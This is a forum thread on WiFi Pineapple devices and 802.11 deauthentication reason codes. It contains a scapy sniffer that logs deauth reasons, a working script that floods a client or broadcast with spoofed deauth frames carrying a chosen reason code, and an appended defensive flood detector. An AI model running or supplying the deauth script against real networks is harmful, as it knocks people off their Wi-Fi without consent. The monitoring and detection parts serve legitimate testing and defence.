ehem Posted March 16, 2017

Hi - new to WiFi Pineapple - I need to be able to specify the deauthentication reason code. Can this be done? thanks.

Just_a_User Posted March 16, 2017 (edited)

> On 3/16/2017 at 2:40 AM, ehem said:
> Hi - new to WiFi Pineapple - I need to be able to specify the de-authentication reason code. Can this be done? thanks.

This interested me too, so I had a look around. I didn't see anything to specify them on the Pineapple; "/pineapple/modules/PineAP/executable/executable" was the closest I came to finding deauth instructions. But I was able to read them doing the below:

Found a Python script that can do it, and it only needed a small modification to work.

Install scapy onto the Pineapple:

    opkg update
    opkg upgrade tar wget
    opkg install python tcpdump unzip
    wget https://github.com/secdev/scapy/archive/v2.4.3rc1.tar.gz
    tar -xvf v2.4.3rc1.tar.gz
    cd scapy*
    python setup.py install
    cd ..
    rm -rf scapy*

Make the authwatch.py - I just used nano and pasted the following into it:

    #!/usr/bin/env python
    ######################################################
    # authWatch.py v. 0.1 (Quick, Dirty and Loud) - by TinMan
    # Place card in monitor mode and set the channel.
    # If you want channel hopping, run airodump-ng in
    # another terminal. Will add channel hopping
    # in the next version.
    ######################################################
    #
    # Usage: python authWatch.py <interface>
    #
    import sys
    from scapy.all import *

    interface = sys.argv[1]

    def sniffReq(p):
        # Look for a deauth packet and print the AP BSSID, Client BSSID and the reason for the deauth.
        if p.haslayer(Dot11Deauth):
            print(p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]"))
        # Look for an association request packet and print the Station BSSID, Client BSSID, AP info.
        if p.haslayer(Dot11AssoReq):
            print(p.sprintf("Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]"))
        # Look for an authentication packet and print the Client and AP BSSID
        if p.haslayer(Dot11Auth):
            print(p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]"))
            print(p.sprintf("------------------------------------------------------------------------------------------"))

    # store=0 keeps scapy from holding every sniffed packet in memory
    sniff(iface=interface, prn=sniffReq, store=0)

Then, to use it, drop an interface into monitor mode on the channel you wish to watch - the example below uses wlan1 and channel 1.

    airmon-ng start wlan1 1

*** Optionally you can run airodump-ng if you want to channel hop, but you will likely miss some packets.

To run the authwatch script:

    python authwatch.py wlan1mon

I tested this on my Pineapple TETRA and saw that when the Pineapple deauths clients I get "Reason [unspec]"; when I turn off the wifi on my phone I get "Reason [deauth-ST-leaving]". Seems to work. Hope this helps.

authwatcher.py scappyinstall.sh

Edited April 16, 2019 by Just_a_User

ehem Posted March 18, 2017 (edited)

Thanks for the reply - very helpful - I had no idea you could install scapy on the Pineapple. Here is a script I wrote in Python using scapy to perform a de-auth with a specific reason code. It takes care of setting the channel, etc., but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is). There are some devices that will behave differently depending on the reason code you send in the de-auth. Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for.

https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes

    import os
    import sys
    from scapy.all import *

    print("Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>")
    print("Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153")
    # Stop here instead of failing with an IndexError when arguments are missing
    if len(sys.argv) != 5:
        sys.exit(1)

    iw = "iwconfig " + sys.argv[3] + " channel " + sys.argv[4]
    numpackets = 150
    hitinter = 0.001
    print("Setting Channel with " + iw)
    os.system(iw)
    print("Sending deauth as BSSID " + sys.argv[1] + " to client MAC address " + sys.argv[2] + " on channel " + sys.argv[4])
    print("On interface " + sys.argv[3])
    # addr1 = destination (client), addr2 = source (BSSID), addr3 = BSSID
    pkt = RadioTap() / Dot11(addr1=sys.argv[2], addr2=sys.argv[1], addr3=sys.argv[1]) / Dot11Deauth(reason=7)
    sendp(pkt, iface=sys.argv[3], count=numpackets, inter=hitinter)
    print("Complete.")

Edited April 15, 2017 by ehem
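The monitoring side of this thread as an added example (not code from either poster or from the Pineapple project): a Python 3 parser that reads the reason code out of raw radiotap-prefixed deauth frames without scapy and flags a source/destination pair that sends a burst of them. The names `parse_deauth`, `DeauthMonitor` and `sample_frame`, the threshold and window defaults, and the sample frame itself are assumptions constructed for the illustration.

```python
import struct
from collections import defaultdict, deque

# Reason codes 1-8 from the IEEE 802.11 reason-code table (subset).
REASONS = {1: "unspecified", 2: "previous authentication no longer valid",
           3: "deauthenticated, STA leaving", 4: "disassociated, inactivity",
           5: "AP cannot handle all STAs", 6: "class 2 frame from unauthenticated STA",
           7: "class 3 frame from unassociated STA", 8: "disassociated, STA leaving BSS"}

def mac(raw):
    return ":".join("%02x" % b for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a radiotap-prefixed deauth, else None."""
    if len(frame) < 4:
        return None
    rt_len = struct.unpack_from("<H", frame, 2)[0]  # radiotap header length
    dot11 = frame[rt_len:]
    if len(dot11) < 26:                             # 24-byte header + 2-byte reason
        return None
    if (dot11[0] >> 2) & 0x3 != 0 or (dot11[0] >> 4) & 0xF != 12:
        return None                                 # not a management/deauth frame
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

class DeauthMonitor:
    """Flag a (src, dst) pair once `threshold` deauths land within `window` seconds."""
    def __init__(self, threshold=10, window=1.0):   # assumed defaults; tune per site
        self.threshold, self.window = threshold, window
        self.seen = defaultdict(deque)

    def observe(self, ts, frame):
        parsed = parse_deauth(frame)
        if parsed is None:
            return None
        dst, src, _bssid, reason = parsed
        times = self.seen[(src, dst)]
        times.append(ts)
        while ts - times[0] > self.window:          # drop timestamps outside the window
            times.popleft()
        return {"src": src, "dst": dst, "reason": reason,
                "reason_text": REASONS.get(reason, "other/reserved"),
                "broadcast": dst == "ff:ff:ff:ff:ff:ff", "flood": len(times) >= self.threshold}

def sample_frame(dst, src, reason):
    """Constructed input: 8-byte radiotap header + deauth frame with src as BSSID."""
    a, b = bytes.fromhex(dst.replace(":", "")), bytes.fromhex(src.replace(":", ""))
    hdr = b"\xc0\x00\x00\x00" + a + b + b + b"\x00\x00"
    return struct.pack("<BBHI", 0, 0, 8, 0) + hdr + struct.pack("<H", reason)
```

Feed `observe()` the capture timestamp and raw bytes of each frame from a monitor-mode interface; a single client-initiated deauth stays below the threshold, while a run of identical frames milliseconds apart sets `flood`.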